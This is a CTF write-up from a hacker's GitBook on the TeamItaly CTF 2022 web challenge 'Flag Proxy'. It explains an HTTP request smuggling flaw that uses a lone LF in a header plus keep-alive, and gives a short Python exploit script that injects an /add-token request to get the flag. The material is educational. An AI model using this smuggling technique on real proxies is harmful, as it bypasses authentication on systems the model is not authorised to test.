🚩
HACKBOOK OF A HACKER
  • README
  • CTF Writeups
    • Intigriti Challenges
      • 1223
    • ASIS CTF quals 2022
      • Beginner Ducks
    • CSAW 2022
      • Dockreleakage
      • My Little Website
      • Word Wide Web
    • Cybersecurityrumble CTF 2022
      • Crymeplx
      • Revmeplx
    • HTB University CTF 2023
      • Rev
        • Windowsofopportunity
    • Metared 2022
      • 1x02..ware
      • Backwards
    • Reply CTF 2022
      • Dungeons And Breakfast
    • Teamitaly CTF 2022
      • Flag Proxy
    • MOCA CTF 2024 Quals
      • RaaS [WEB]
  • Smart Contracts Security
    • Code 4 Rena
      • High Risk Findings
        • Anyone Can Pass Any Proposal
        • Arithmetic Rounding
        • Can Vote Multiple Times By Transferring NFT In Same Block As Proposal
        • Never Ending Proposal
        • Reusing Signatures
        • Signature Verification Can Be Bypass With Zero Address
        • Untyped Data Signing
        • Wrong Calculation Of Apr
      • Low Risk Non Critical
        • Dont Check If Some Entity Actually Exists
      • Medium Risk Findings
        • Bypass Signature Validity Check
        • Copy Of Lack Of Verification In Hashes
        • Function May Run Out Of Gas Leading To Loss
        • Incorrect Initialization Of Smart Contracts With Access Control Issue
        • Invalid Signature Lead To Access Control
        • Lack Of Checks If One Entity Get Hacked
        • Lack Of Verification In Hashes
        • Missing Upper Limit
        • Missing Zero Address Checks
        • Possible Dos Because Unbounded Loop Can Run Out Of Gas
        • Too Much Trust To Certain Roles
        • Unreversable Actions
        • Useless Nft
  • T.I.L.
    • 16 09 22
Powered by GitBook
On this page
  1. CTF Writeups
  2. Teamitaly CTF 2022

Flag Proxy

WEB | 471 pts - 41 solves

PreviousTeamitaly CTF 2022NextMOCA CTF 2024 Quals

Last updated 10 months ago

Description: I just added authentication to my flag service (server-back) thanks to a proxy (server-front), but a friend said it's useless... Site: Author: @Giotino

Looking at the challenge, we see that the website it's powered by Express.js. Looking in the source code we see that the endpoints it accepts are: /flag and /add-token. To get the flag we have to make a request with the ?token parameter which value will then be passed to the Authorization header that will be sent to the backend; which to be valid must be inside the tokens[] array. We can add values to tokens[] array by making a request at /add-token with the parameters: ?token (the token we want to set) and ?auth (some sort of password). Looking at the logic of these two endpoints, it would seem almost impossible to find an attack vector. But looking beyond the index.js's we notice that in the server-front, http-client.js manages and parse all the requests and responses of the application. Looking more carefully we notice how on it checks that in the headers we pass, there is no LF character to protect from http request smuggling attacks. However, the program only checks for the sequence , but not the character alone which probably being HTTP 1.0 and an old version of node.js, could work. Also we need to find a way to chain requests in HTTP 1.0 (modern http-smuggling techniques won't work, i.e: Transfer-Encoding: chunked), this can be done by setting the header Connection: keep-alive. Let's try to craft a double smuggling request with docker container running in local to analyze logs:

It's working! Now, lets make a request to /add-token with an arbitrary token, to be able to write our token inside tokens[] array, bypassing app checks (AUTH param), and later getting the flag:

import requests

url = "http://flag-proxy.challs.teamitaly.eu/flag"
token = "httpsmugglingiscool"
smuggle = f"SMUGGLE\nContent-Length: 0\nConnection: keep-alive\n\nGET /add-token?token={token} HTTP/1.0"

req1 = requests.get(url, params={"token": smuggle})
#print(req1.text)

req2 = requests.get(url, params={'token': token})
print(req2.json()['body'])

flag{sanity_check}

http://flag-proxy.challs.olicyber.it
line 55-58